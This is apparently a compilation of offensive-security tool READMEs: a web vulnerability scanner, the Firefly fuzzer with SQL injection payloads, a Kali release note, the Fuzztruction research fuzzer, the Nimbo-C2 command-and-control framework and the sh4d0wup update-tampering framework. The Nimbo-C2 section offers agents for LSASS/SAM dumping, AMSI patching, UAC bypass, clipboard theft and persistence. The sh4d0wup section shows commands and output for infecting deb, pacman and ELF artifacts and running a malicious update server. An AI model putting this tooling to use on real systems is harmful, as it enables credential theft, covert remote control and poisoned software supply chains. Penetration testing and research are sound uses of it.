    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



Firefly - Black Box Fuzzer For Web Applications

By: Zion3R

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

Β 

Advantages

  • Hevy use of gorutines and internal hardware for great preformance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly cusomized to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Build in payloads (default list are mixed with the wordlist from seclists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method do not work try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List of all Tampers avalible

firefly -list-tamper

Tamper all paylodas with given type (More than one can be used separated by comma)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The Payloads: ' or (1=1)-- - and " or(20=20)or " Will result in: ' or (13=(37-24))-- - and " or(13=(37-24))or " Where the => (with spaces) inducate the "replace to".

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Preformance

Preformance and time delays to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time Delay in millisecounds (ms) for each Concurrency

FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlist that contains the paylaods can be added separatly or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlists names inside folder wl :

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate throw the result and compare it.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!



Kali Linux 2023.2 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.2. This release has various impressive updates.


The changelog highlights over the last few weeks since March’s release of 2023.1 is:

Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rule'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


Features

  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscate the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more !

Installation

Easy Way

  1. Clone the repository and cd in
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
  1. Build the docker image
docker build -t nimbo-dependencies .
  1. cd again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
</ div>

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and it carries the real agent id, which some products may flag it suspicious.
  • When using assembly command, make sure your assembly doesn't call any exit function because it will kill the agent.
  • shellc command may unexpectedly crash or change the injected process behavior, test the shellcode and the target process first.
  • audio, lsass and sam commands temporarily save artifacts to disk before exfiltrate and delete them.
  • Cleaning the persist commands should be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), keep should leave you with 2 active agents probing the C2, then you should manually kill the unelevated.
  • msgbox is blocking, until the user will press the ok button.

Contribution

This software may be buggy or unstable in some use cases as it not being fully and constantly tested. Feel free to open issues, PR's, and contact me for any reason at (Gmail | Linkedin | Twitter).

Credits

  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2 agent capabilities are basically wrappers around OffensiveNim modified examples.
  • Python-Prompt-Toolkit-3 - Awsome library for developing python CLI applications. Developed the Nimbo-C2 interactive console using this.
  • ascii-image-converter - For the awsome Nimbo ascii art.
  • All those random people from Github & Stackoverflow that I copy & pasted their code
    
    .


Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called consumer, but triggers unexpected behavior in deeper program logic. This allows to even fuzz targets that utilize cryptography primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.

Β 

Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# donwloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env /start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Runninge start.sh the second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzers environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first.
./env/stop.sh This stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access per default.

Permissions: The Docker images' user is named user and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

Container Path Host Path Note
/home/user/fuzztruction ./ Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host.
/home/user/shared ./ Used to exchange data with the host.
/home/user/.zshrc ./data/zshrc -
/home/user/.zsh_history ./data/zsh_history -
/home/user/.bash_history ./data/bash_history -
/home/user/.config/nvim/init.vim ./data/init.vim -
/home/user/.config/Code ./data/vscode-data Used to persist Visual Studio Code config between container restarts.
/ssh-agent $SSH_AUTH_SOCK Allows using the SSH-Agent inside the container if it runs on the host.
/home/user/.gitconfig /home/$USER/.gitconfig Use gitconfig from the host, if there is any config.
/ccache ./data/ccache Used to persist ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

Artifacts Description
./generator/pass/fuzztruction-source-llvm-pass.so The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell.
./generator/pass/fuzztruction-source-clang-fast A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main.
./target/debug/libgenerator_agent.so The agent the is injected into the generator application.
./target/debug/fuzztruction The fuzztruction binary representing the actual fuzzer.

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the building process may take up to several hours for building the AFL++ binary because of the collision free coverage map encoding feature and compare splitting.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.

Benchmarking the Target

Using the following command

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

allows testing whether the target works. Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer using the same flags as in the config file might reveal any typo in the command line used to execute the application. In the case of using LD_PRELOAD, double check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. In case AFL++ should be executed independently but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.

Computing Coverage

After the fuzzing run is terminated, the tracer subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.



Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completion s Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

You can find examples here:

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Intera ct with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflic ts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
